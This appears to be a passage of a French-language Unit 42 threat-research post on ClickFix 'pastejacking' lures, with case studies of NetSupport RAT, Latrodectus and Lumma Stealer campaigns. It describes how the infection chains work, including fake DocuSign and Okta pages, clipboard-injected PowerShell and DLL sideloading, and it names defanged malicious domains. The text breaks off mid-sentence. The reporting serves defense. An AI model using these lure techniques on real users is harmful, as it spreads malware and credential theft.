{"id":152402,"date":"2025-07-10T07:19:54","date_gmt":"2025-07-10T14:19:54","guid":{"rendered":"https:\/\/unit42.paloaltonetworks.com\/?p=152402"},"modified":"2025-08-20T08:28:44","modified_gmt":"2025-08-20T15:28:44","slug":"preventing-clickfix-attack-vector","status":"publish","type":"post","link":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/preventing-clickfix-attack-vector\/","title":{"rendered":"Fixez le clic\u00a0: pr\u00e9vention du vecteur d\u2019attaque ClickFix"},"content":{"rendered":"<h2><a id=\"post-152402-_heading=h.4uarsbjpv5u3\"><\/a>Synth\u00e8se<\/h2>\n<p>Dans cet article, nous partageons des conseils de d\u00e9tection et des strat\u00e9gies d\u2019att\u00e9nuation pour les campagnes ClickFix, ainsi qu\u2019un aper\u00e7u des campagnes ClickFix les plus marquantes que nous avons observ\u00e9es jusqu\u2019\u00e0 pr\u00e9sent en 2025\u00a0:<\/p>\n<ul>\n<li>Les attaquants qui distribuent le cheval de Troie d\u2019acc\u00e8s \u00e0 distance (RAT) NetSupport intensifient leurs activit\u00e9s avec un nouveau chargeur<\/li>\n<li>Les attaquants qui diffusent le malware Latrodectus attirent les victimes par le biais d\u2019une nouvelle campagne ClickFix<\/li>\n<li>Campagne Prolific Lumma Stealer ciblant plusieurs secteurs avec de nouvelles techniques<\/li>\n<\/ul>\n<p>ClickFix est une technique de plus en plus r\u00e9pandue que les acteurs de la menace utilisent dans les leurres d\u2019ing\u00e9nierie sociale. Cette technique incite les victimes potentielles \u00e0 ex\u00e9cuter des commandes malveillantes, sous pr\u00e9texte d\u2019apporter des \u00ab\u00a0solutions rapides\u00a0\u00bb \u00e0 des probl\u00e8mes informatiques courants.<\/p>\n<p>Ces campagnes utilisent la r\u00e9putation de produits et de services l\u00e9gitimes pour dissimuler leurs activit\u00e9s de mani\u00e8re \u00e0 les rendre plus difficiles \u00e0 rep\u00e9rer. Cela ne signifie pas que l\u2019auteur du fichier ex\u00e9cutable est fautif ou responsable du r\u00e9sultat caus\u00e9 par le malware.<\/p>\n<p>Les campagnes ClickFix ont eu un impact sur des organisations op\u00e9rant dans divers secteurs, notamment\u00a0:<\/p>\n<ul>\n<li>Haute technologie<\/li>\n<li>Services financiers<\/li>\n<li>Fabrication<\/li>\n<li>Retail et vente en gros<\/li>\n<li>Collectivit\u00e9s locales et territoriales<\/li>\n<li>Services professionnels et juridiques<\/li>\n<li>Services publics et \u00e9nergie<\/li>\n<\/ul>\n<p>Unit\u00a042 a r\u00e9cemment particip\u00e9 \u00e0 pr\u00e8s d\u2019une douzaine de cas de r\u00e9ponse \u00e0 des incidents dans lesquels un leurre ClickFix \u00e9tait le vecteur d\u2019acc\u00e8s initial.<\/p>\n<p>Un leurre ClickFix efficace pourrait permettre aux acteurs de la menace de prendre le contr\u00f4le complet de l\u2019organisation cibl\u00e9e. Ces leurres peuvent \u00eatre assez simples \u00e0 pr\u00e9parer pour les acteurs de la menace, laissant les organisations vuln\u00e9rables \u00e0 la collecte de donn\u00e9es d\u2019identification, au vol de courrier et m\u00eame \u00e0 des incidents de type ransomware.<\/p>\n<p>Nous avons identifi\u00e9 deux variantes de cette technique\u00a0:<\/p>\n<ul>\n<li>Demander \u00e0 une cible d\u2019ex\u00e9cuter des commandes malveillantes dans la fen\u00eatre d\u2019ex\u00e9cution en appuyant sur la touche Windows + R (<span style=\"font-family: 'courier new', courier, monospace;\">Win+R<\/span>)<\/li>\n<li>Demander \u00e0 une victime potentielle d\u2019ex\u00e9cuter des commandes malveillantes dans une fen\u00eatre de terminal en appuyant sur la touche Windows + X (<span style=\"font-family: 'courier new', courier, monospace;\">Win+X<\/span>)<\/li>\n<\/ul>\n<p>Les clients de Palo\u00a0Alto\u00a0Networks sont mieux prot\u00e9g\u00e9s contre les menaces mentionn\u00e9es dans cet article gr\u00e2ce aux produits et services suivants\u00a0:<\/p>\n<ul>\n<li><a href=\"https:\/\/www.paloaltonetworks.com\/network-security\/advanced-wildfire\" target=\"_blank\" rel=\"noopener\">Advanced WildFire<\/a><\/li>\n<li><a href=\"https:\/\/www.paloaltonetworks.com\/network-security\/advanced-url-filtering\" target=\"_blank\" rel=\"noopener\">Advanced URL Filtering<\/a> et <a href=\"https:\/\/www.paloaltonetworks.com\/network-security\/advanced-dns-security\" target=\"_blank\" rel=\"noopener\">Advanced DNS Security<\/a><\/li>\n<li><a href=\"https:\/\/docs-cortex.paloaltonetworks.com\/p\/XDR\" target=\"_blank\" rel=\"noopener\">Cortex\u00a0XDR<\/a> et <a href=\"https:\/\/docs-cortex.paloaltonetworks.com\/p\/XSIAM\" target=\"_blank\" rel=\"noopener\">XSIAM<\/a><\/li>\n<\/ul>\n<p>Si vous pensez que votre entreprise a pu \u00eatre compromise ou si vous faites face \u00e0 une urgence, contactez l\u2019<a href=\"https:\/\/start.paloaltonetworks.com\/contact-unit42.html\" target=\"_blank\" rel=\"noopener\">\u00e9quipe Unit\u00a042 de r\u00e9ponse aux incidents<\/a>.<\/p>\n<table style=\"width: 100%; height: 17px;\">\n<thead>\n<tr style=\"height: 17px;\">\n<td style=\"width: 35%; height: 17px;\"><b>Unit\u00a042 -\u00a0Th\u00e9matiques connexes<\/b><\/td>\n<td style=\"width: 100%; height: 17px;\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/fr\/tag\/social-engineering-fr\/\" target=\"_blank\" rel=\"noopener\"><b>Social Engineering<\/b><\/a>, <strong><a href=\"https:\/\/unit42.paloaltonetworks.com\/fr\/category\/malware-fr\/\" target=\"_blank\" rel=\"noopener\">Malware<\/a><\/strong>,<a href=\"https:\/\/unit42.paloaltonetworks.com\/fr\/tag\/malvertising-fr\/\" target=\"_blank\" rel=\"noopener\"><strong> Malvertising<\/strong><\/a><\/td>\n<\/tr>\n<\/thead>\n<\/table>\n<h2><a id=\"post-152402-_heading=h.7fryh27oshda\"><\/a>Analyse en d\u00e9tail de la technique ClickFix<\/h2>\n<p>Avant d\u2019examiner la technique ClickFix, il convient de mieux comprendre ce qu\u2019est ClickFix et l\u2019ampleur que cette menace a prise ces derniers mois.<\/p>\n<p>ClickFix est une technique d\u2019ing\u00e9nierie sociale relativement nouvelle que les acteurs de la menace utilisent de plus en plus dans leurs campagnes d\u2019attaque. Cette technique incite les utilisateurs cibl\u00e9s \u00e0 appliquer des \u00ab\u00a0solutions rapides\u00a0\u00bb \u00e0 des probl\u00e8mes informatiques courants, tels que des probl\u00e8mes de performance, des pilotes manquants ou des erreurs de fen\u00eatres contextuelles. Ces derniers mois, de nombreux leurres utilisant la technique ClickFix ont pris la forme de fausses pages de v\u00e9rification demandant aux victimes d\u2019effectuer une action avant de pouvoir, soi-disant, acc\u00e9der \u00e0 la destination souhait\u00e9e.<\/p>\n<p>Les acteurs de la menace utilisent souvent des leurres suivants\u00a0:<\/p>\n<ul>\n<li>Sites web l\u00e9gitimes mais compromis<\/li>\n<li>Malvertising<\/li>\n<li>Tutoriels YouTube<\/li>\n<li>Faux forums d\u2019assistance technique<\/li>\n<\/ul>\n<p>La technique ClickFix repose sur le <a href=\"https:\/\/www.malwarebytes.com\/blog\/news\/2025\/03\/fake-captcha-websites-hijack-your-clipboard-to-install-information-stealers\" target=\"_blank\" rel=\"noopener\">d\u00e9tournement du presse-papiers<\/a>. Les pages web utilisant ClickFix injectent des scripts ou des commandes malveillants dans le presse-papiers d\u2019une victime potentielle et fournissent des instructions pour coller et ex\u00e9cuter le contenu malveillant. Comme la technique ClickFix demande aux utilisateurs de coller le contenu, on parle parfois de \u00ab\u00a0pastejacking\u00a0\u00bb.<\/p>\n<p>Les attaquants utilisent la technique ClickFix comme vecteur d\u2019infection initial et les payloads qui suivent varient\u00a0; certains leurres d\u00e9posent des voleurs d\u2019informations, d\u2019autres d\u00e9ploient des RAT ou d\u00e9sactivent des outils de s\u00e9curit\u00e9. Mais tous reposent sur le fait de convaincre la victime de faire le travail de l\u2019attaquant \u00e0 sa place\u00a0: ex\u00e9cuter le code manuellement.<\/p>\n<p>Cette m\u00e9thode de diffusion permet de contourner de nombreux contr\u00f4les de d\u00e9tection et de pr\u00e9vention standard. Il n\u2019y a pas d\u2019exploit, de pi\u00e8ce jointe d\u2019hame\u00e7onnage ou de lien malveillant. Au lieu de cela, les victimes potentielles ex\u00e9cutent la commande elles-m\u00eames, \u00e0 leur insu, par l\u2019interm\u00e9diaire d\u2019un shell syst\u00e8me de confiance.<\/p>\n<p>Cette m\u00e9thode rend les infections par ClickFix plus difficiles \u00e0 d\u00e9tecter que les t\u00e9l\u00e9chargements furtifs ou les droppers de malwares traditionnels. Cependant, les chercheurs peuvent toujours identifier des artefacts pour d\u00e9tecter ces infections.<\/p>\n<h3><a id=\"post-152402-_heading=h.3lam5bhvaud4\"><\/a>La croissance globale du ph\u00e9nom\u00e8ne ClickFix<\/h3>\n<p>Nous avons surveill\u00e9 de pr\u00e8s les leurres ClickFix au cours des derniers mois et nous avons trouv\u00e9 des dizaines de variantes qui diffusent plusieurs familles de malwares. La figure\u00a01 montre la r\u00e9partition des cas par semaine.<\/p>\n<figure id=\"attachment_152403\" aria-describedby=\"caption-attachment-152403\" style=\"width: 800px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-152403 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/chart-6.png\" alt=\"Diagramme \u00e0 barres montrant le nombre d\u2019\u00e9v\u00e9nements par semaine, de la semaine d\u00e9butant le 30\u00a0d\u00e9cembre\u00a02024 et se terminant le 12\u00a0mai\u00a02025. Le nombre d\u2019\u00e9v\u00e9nements varie de 1 \u00e0 126. Des pics importants sont observ\u00e9s durant la semaine d\u00e9butant le 27\u00a0janvier\u00a02025 avec 121\u00a0\u00e9v\u00e9nements, et celle commen\u00e7ant le 24\u00a0mars\u00a02025 avec 126\u00a0\u00e9v\u00e9nements.\" width=\"800\" height=\"425\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/chart-6.png 1396w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/chart-6-786x418.png 786w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/chart-6-1317x700.png 1317w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/chart-6-768x408.png 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/><figcaption id=\"caption-attachment-152403\" class=\"wp-caption-text\">Figure 1. Cas d\u2019infection hebdomadaires depuis le d\u00e9but de 2025.<\/figcaption><\/figure>\n<p>Nos chercheurs ont \u00e9galement constat\u00e9 l\u2019impact de ClickFix sur un large \u00e9ventail de secteurs d\u2019activit\u00e9, comme l\u2019indique la figure\u00a02.<\/p>\n<figure id=\"attachment_152414\" aria-describedby=\"caption-attachment-152414\" style=\"width: 800px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-152414 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-63514-152402-2.png\" alt=\"Graphique \u00e0 barres montrant le nombre d\u2019entit\u00e9s par secteur d\u2019activit\u00e9. Les secteurs repr\u00e9sent\u00e9s, par ordre d\u00e9croissant, sont les suivants\u00a0: Haute technologie, Services financiers, Industrie manufacturi\u00e8re, Commerce de gros et de d\u00e9tail, Administrations locales et r\u00e9gionales, Services professionnels et juridiques, Services publics et \u00e9nergie, Pharmaceutique et sciences de la vie, H\u00f4tellerie et restauration, T\u00e9l\u00e9communications, Sant\u00e9, Gouvernement f\u00e9d\u00e9ral, \u00c9ducation. Blocage des logos de Palo\u00a0Alto\u00a0Networks et de Unit\u00a042.\" width=\"800\" height=\"686\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-63514-152402-2.png 2048w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-63514-152402-2-513x440.png 513w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-63514-152402-2-817x700.png 817w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-63514-152402-2-768x658.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-63514-152402-2-1536x1316.png 1536w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/><figcaption id=\"caption-attachment-152414\" class=\"wp-caption-text\">Figure 2. R\u00e9partition des secteurs touch\u00e9s par les leurres ClickFix.<\/figcaption><\/figure>\n<h2><a id=\"post-152402-_heading=h.l75bjks260si\"><\/a>\u00c9tudes de cas<\/h2>\n<p>Trois des campagnes les plus importantes que nous avons observ\u00e9es jusqu\u2019\u00e0 pr\u00e9sent en 2025 montrent comment les acteurs de la menace ont int\u00e9gr\u00e9 ClickFix dans la cha\u00eene d\u2019attaque de diverses familles de malwares.<\/p>\n<h3><a id=\"post-152402-_heading=h.wfuu1u3p7von\"><\/a>NetSupport RAT change sa m\u00e9thode de distribution<\/h3>\n<p>Lors de la recherche d\u2019activit\u00e9s li\u00e9es \u00e0 ClickFix, nous avons identifi\u00e9 une campagne particuli\u00e8rement prolifique, active en mai\u00a02025. Dans le cadre de cette campagne, les attaquants utilisant NetSupport RAT ont touch\u00e9 plusieurs secteurs d\u2019activit\u00e9, dont les suivants\u00a0:<\/p>\n<ul>\n<li>Sant\u00e9<\/li>\n<li>Services juridiques<\/li>\n<li>T\u00e9l\u00e9communications<\/li>\n<li>Retail<\/li>\n<li>Exploitation mini\u00e8re<\/li>\n<\/ul>\n<p>Cette campagne ClickFix distribuant les malwares NetSupport RAT utilise des domaines de distribution qui se font passer pour des services l\u00e9gitimes et bien connus\u00a0:<\/p>\n<ul>\n<li>DocuSign\u00a0: une plateforme num\u00e9rique permettant de signer, d\u2019envoyer et de g\u00e9rer des documents par voie \u00e9lectronique.<\/li>\n<li>Okta\u00a0: une plateforme qui aide les entreprises \u00e0 g\u00e9rer et \u00e0 s\u00e9curiser l\u2019acc\u00e8s des utilisateurs aux applications et aux syst\u00e8mes. Elle fournit des services d\u2019authentification unique (SSO), d\u2019authentification multifactorielle et de gestion des identit\u00e9s.<\/li>\n<\/ul>\n<p>Les acteurs de la menace abusent souvent des produits l\u00e9gitimes, en tirent parti ou les d\u00e9tournent \u00e0 des fins malveillantes. Cela ne signifie pas que le produit l\u00e9gitime est d\u00e9fectueux ou malveillant.<\/p>\n<p>Les figures\u00a03 et 4 montrent les fausses pages de renvoi de DocuSign et d\u2019Okta\u00a0:<\/p>\n<p><figure id=\"attachment_152425\" aria-describedby=\"caption-attachment-152425\" style=\"width: 800px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-152425 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-67801-152402-3.png\" alt=\"Page de renvoi usurp\u00e9e de PandaDoc, pr\u00e9sentant l\u2019alternative \u00e0 la signature de documents, soulignant la facilit\u00e9 et la rentabilit\u00e9, avec divers badges industriels et logos de marques de confiance.\" width=\"800\" height=\"511\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-67801-152402-3.png 1308w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-67801-152402-3-689x440.png 689w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-67801-152402-3-1097x700.png 1097w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-67801-152402-3-768x490.png 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/><figcaption id=\"caption-attachment-152425\" class=\"wp-caption-text\">Figure 3. Page de renvoi factice de DocuSign \u00e0 <span style=\"font-family: 'courier new', courier, monospace;\">docusign.sa[.]com<\/span>.<\/figcaption><\/figure><figure id=\"attachment_152436\" aria-describedby=\"caption-attachment-152436\" style=\"width: 700px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-152436 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-70932-152402-4.png\" alt=\"Capture d\u2019\u00e9cran d\u2019une page de v\u00e9rification de s\u00e9curit\u00e9 usurp\u00e9e comportant une case \u00e0 cocher intitul\u00e9e \u00ab\u00a0Confirmez que vous n\u2019\u00eates pas un robot\u00a0\u00bb, avec un logo Cloudflare en dessous. Le message indique que le site doit v\u00e9rifier la s\u00e9curit\u00e9 de votre connexion avant de poursuivre.\" width=\"700\" height=\"387\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-70932-152402-4.png 1141w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-70932-152402-4-786x435.png 786w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-70932-152402-4-768x425.png 768w\" sizes=\"(max-width: 700px) 100vw, 700px\" \/><figcaption id=\"caption-attachment-152436\" class=\"wp-caption-text\">Figure 4. Page de renvoi factice d\u2019Okta \u00e0 <span style=\"font-family: 'courier new', courier, monospace;\">oktacheck.it[.]com<\/span>.<\/figcaption><\/figure>Nous soup\u00e7onnons cette campagne ClickFix de distribuer le malware RAT NetSupport par l\u2019interm\u00e9diaire de l\u2019infrastructure <a href=\"https:\/\/reliaquest.com\/blog\/new-execution-technique-in-clearfake-campaign\/\" target=\"_blank\" rel=\"noopener\">ClearFake<\/a>. Nos soup\u00e7ons se fondent sur les similitudes entre le leurre ClickFix et l\u2019infrastructure ClearFake. Tous deux contiennent les m\u00eames commentaires en russe et utilisent la m\u00eame fonctionnalit\u00e9 JavaScript d\u2019injection dans le presse-papiers.<\/p>\n<p>ClearFake est un framework JavaScript malveillant d\u00e9ploy\u00e9 sur des sites web compromis dans le cadre de campagnes de t\u00e9l\u00e9chargement furtif utilis\u00e9es par d\u2019autres souches de malware. La figure\u00a05 illustre ClearFake injectant une commande PowerShell cod\u00e9e \u00e0 l\u2019aide de la fonction JavaScript <span style=\"font-family: 'courier new', courier, monospace;\">unsecuredCopyToClipboard<\/span>. La figure montre \u00e9galement des commentaires en russe dans le code, ce qui nous donne des indices sur les origines du d\u00e9veloppeur de ClearFake.<\/p>\n<figure id=\"attachment_152447\" aria-describedby=\"caption-attachment-152447\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-152447 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-73656-152402-5.png\" alt=\"Une capture d\u2019\u00e9cran divis\u00e9e en deux sections, affichant les \u00e9tapes de v\u00e9rification \u00e0 gauche et du code informatique \u00e0 droite. Sur la gauche, une interface orange indique \u00e0 l\u2019utilisateur de suivre des \u00e9tapes de v\u00e9rification telles que maintenir la touche Windows enfonc\u00e9e tout en appuyant sur R, puis valider en appuyant sur Entr\u00e9e. Il s\u2019agit de la premi\u00e8re \u00e9tape. \u00c0 droite, une interface de codage affiche des lignes de code en rouge et en noir, accompagn\u00e9es de commentaires en russe, indiquant des modifications apport\u00e9es \u00e0 une commande PowerShell. La deuxi\u00e8me \u00e9tape est la commande PowerShell masqu\u00e9e, inject\u00e9e via le clavier de l\u2019utilisateur. \" width=\"1000\" height=\"394\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-73656-152402-5.png 2048w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-73656-152402-5-786x309.png 786w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-73656-152402-5-1779x700.png 1779w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-73656-152402-5-768x302.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-73656-152402-5-1536x605.png 1536w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-152447\" class=\"wp-caption-text\">Figure\u00a05. Page de renvoi et injection de script dans une page DocuSign factice.<\/figcaption><\/figure>\n<p>La fausse fen\u00eatre de v\u00e9rification affiche des instructions pour ouvrir la bo\u00eete de dialogue Run et y coller le contenu du presse-papiers, l\u2019interface pr\u00e9sentant ces instructions comme un test prouvant que l\u2019utilisateur n\u2019est pas un robot. La victime peut ignorer la commande PowerShell malveillante que le site web injecte par la suite (comme indiqu\u00e9 ci-dessus, il s\u2019agit d\u2019un exemple de <a href=\"https:\/\/github.com\/dxa4481\/Pastejacking\" target=\"_blank\" rel=\"noopener\">pastejacking<\/a>).<\/p>\n<p>Une fois ex\u00e9cut\u00e9e, la commande t\u00e9l\u00e9charge un autre script PowerShell qui t\u00e9l\u00e9charge et ex\u00e9cute l\u2019\u00e9tape suivante de l\u2019attaque. La cha\u00eene d\u2019infection est d\u00e9crite dans la figure\u00a06.<\/p>\n<figure id=\"attachment_152458\" aria-describedby=\"caption-attachment-152458\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-152458 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-78041-152402-6.png\" alt=\"Organigramme illustrant une cyberattaque impliquant de fausses invites d\u2019un site Okta contrefait, l\u2019ex\u00e9cution de cmd.exe et de PowerShell pour t\u00e9l\u00e9charger et ex\u00e9cuter des malwares, dont NetSupport RAT et divers fichiers ex\u00e9cutables, aboutissant \u00e0 l\u2019injection et \u00e0 l\u2019exfiltration de donn\u00e9es.\" width=\"1000\" height=\"728\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-78041-152402-6.png 2048w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-78041-152402-6-604x440.png 604w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-78041-152402-6-962x700.png 962w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-78041-152402-6-768x559.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-78041-152402-6-1536x1118.png 1536w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-152458\" class=\"wp-caption-text\">Figure 6. La cha\u00eene d\u2019infection NetSupport RAT.<\/figcaption><\/figure>\n<p>L\u2019\u00e9tape suivante est contenue dans une archive ZIP, qui comprend toutes les d\u00e9pendances l\u00e9gitimes n\u00e9cessaires \u00e0 l\u2019ex\u00e9cution de <span style=\"font-family: 'courier new', courier, monospace;\">jp2launcher.exe<\/span>. Ce fichier est un composant l\u00e9gitime de l\u2019environnement d\u2019ex\u00e9cution Java (JRE) utilis\u00e9 pour lancer des applications Java, comme le montre la figure\u00a07.<\/p>\n<figure id=\"attachment_152469\" aria-describedby=\"caption-attachment-152469\" style=\"width: 618px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-152469 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-81545-152402-7.png\" alt=\"Capture d\u2019\u00e9cran d\u2019un ordinateur affichant une liste de fichiers principalement li\u00e9s aux composants et applications de Microsoft\u00a0Windows. Chaque entr\u00e9e de fichier indique le nom du fichier, la date de modification, le type et la taille. Trois lignes sont mises en \u00e9vidence dans un encadr\u00e9 rouge.\" width=\"618\" height=\"352\" \/><figcaption id=\"caption-attachment-152469\" class=\"wp-caption-text\">Figure 7. Contenu de l\u2019archive ZIP t\u00e9l\u00e9charg\u00e9e par <span style=\"font-family: 'courier new', courier, monospace;\">cmd.exe<\/span>.<\/figcaption><\/figure>\n<p>Tout d\u2019abord, cmd.exe t\u00e9l\u00e9charge l\u2019archive ZIP, extrait son contenu et l\u2019enregistre dans le r\u00e9pertoire <span style=\"font-family: 'courier new', courier, monospace;\">%APPDATA%\/Local\/Temp\/<\/span>. Ensuite, <span style=\"font-family: 'courier new', courier, monospace;\">cmd.exe<\/span> lance <span style=\"font-family: 'courier new', courier, monospace;\">jp2launcher.exe,<\/span> qui transf\u00e8re un chargeur malveillant nomm\u00e9 <span style=\"font-family: 'courier new', courier, monospace;\">msvcp140.dll<\/span>. L\u2019<a href=\"#post-152402-_heading=h.4pfb07h9b40i\" target=\"_blank\" rel=\"noopener\">annexe<\/a> de cet article fournit une analyse technique compl\u00e8te du nouveau chargeur de NetSupport RAT bas\u00e9 sur un fichier\u00a0DLL<strong>. <\/strong><\/p>\n<p>Enfin, le fichier DLL t\u00e9l\u00e9charge et ex\u00e9cute une archive ZIP qui contient NetSupport RAT (<span style=\"font-family: 'courier new', courier, monospace;\">client32.exe<\/span>) et les fichiers associ\u00e9s. NetSupport RAT est un logiciel l\u00e9gitime, mais les copies obsol\u00e8tes ou vol\u00e9es sont souvent utilis\u00e9es \u00e0 mauvais escient par <a href=\"https:\/\/blogs.vmware.com\/security\/2023\/11\/netsupport-rat-the-rat-king-returns.html\" target=\"_blank\" rel=\"noopener\">diff\u00e9rents acteurs de la menace<\/a>, g\u00e9n\u00e9ralement configur\u00e9es comme un malware\u00a0RAT pour l\u2019infiltration et l\u2019infection des terminaux.<\/p>\n<h3><a id=\"post-152402-_heading=h.opivrawxggsu\"><\/a>Latrodectus d\u00e9ploie de nouveaux leurres ClickFix pour pi\u00e9ger ses victimes<\/h3>\n<p>En mars-avril 2025, nous avons constat\u00e9 une augmentation du trafic vers les domaines contr\u00f4l\u00e9s par Latrodectus. Nous avons \u00e9galement constat\u00e9 un changement dans la strat\u00e9gie d\u2019infection, les attaquants distribuant Latrodectus ayant commenc\u00e9 \u00e0 utiliser la technique ClickFix dans leurs vecteurs d\u2019acc\u00e8s initial.<\/p>\n<p>La cha\u00eene d\u2019attaque Latrodectus commence lorsqu\u2019une personne visite un site web l\u00e9gitime, mais compromis. Ensuite, l\u2019infrastructure ClearFake redirige le visiteur du site vers une fausse page de v\u00e9rification. Cette page pr\u00e9sente une invite demandant \u00e0 l\u2019utilisateur d\u2019ex\u00e9cuter une commande via la bo\u00eete de dialogue Run, tandis que le backend JavaScript malveillant injecte une commande PowerShell dans le presse-papiers du terminal.<\/p>\n<p>La figure 8 ci-dessous montre le leurre et la cha\u00eene de redirection qui s\u2019ensuit \u00e0 partir du site compromis.<\/p>\n<figure id=\"attachment_152480\" aria-describedby=\"caption-attachment-152480\" style=\"width: 800px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-152480 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-84683-152402-8.png\" alt=\"Capture d\u2019\u00e9cran d\u2019un ordinateur affichant une page de v\u00e9rification captcha invitant l\u2019utilisateur \u00e0 effectuer les \u00e9tapes \u00e0 l\u2019aide de raccourcis clavier. L\u2019\u00e9cran affiche \u00e9galement les outils de d\u00e9veloppement web ouverts dans le navigateur, avec divers noms de scripts visibles.\" width=\"800\" height=\"461\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-84683-152402-8.png 1831w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-84683-152402-8-764x440.png 764w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-84683-152402-8-1216x700.png 1216w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-84683-152402-8-768x442.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-84683-152402-8-1536x884.png 1536w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/><figcaption id=\"caption-attachment-152480\" class=\"wp-caption-text\">Figure 8. Leurre Latrodectus ClickFix.<\/figcaption><\/figure>\n<p>Lorsque les victimes collent et ex\u00e9cutent la commande inject\u00e9e, elles ne voient pas la commande elle-m\u00eame. Ce qu\u2019elles voient, c\u2019est le commentaire \u00e0 la fin du script (<span style=\"font-family: 'courier new', courier, monospace;\">Cloud Identificator: 2031<\/span>), qui semble faire partie d\u2019un processus d\u2019authentification normal. Cependant, une fois ex\u00e9cut\u00e9, le script utilise curl.exe pour t\u00e9l\u00e9charger un fichier JavaScript \u00e0 partir d\u2019un serveur\u00a0C2. Il ex\u00e9cute ensuite le fichier via Cscript, comme l\u2019indique la figure\u00a09.<\/p>\n<figure id=\"attachment_152491\" aria-describedby=\"caption-attachment-152491\" style=\"width: 832px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-152491 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-89457-152402-9.png\" alt=\"Extrait de code avec surlignage syntaxique en mode sombre, comportant certaines zones caviard\u00e9es pour des raisons de confidentialit\u00e9.\" width=\"832\" height=\"68\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-89457-152402-9.png 832w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-89457-152402-9-786x64.png 786w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-89457-152402-9-768x63.png 768w\" sizes=\"(max-width: 832px) 100vw, 832px\" \/><figcaption id=\"caption-attachment-152491\" class=\"wp-caption-text\">Figure 9. Une commande malveillante inject\u00e9e \u00e0 partir d\u2019un leurre ClickFix dans le presse-papiers de la cible.<\/figcaption><\/figure>\n<p>Depuis 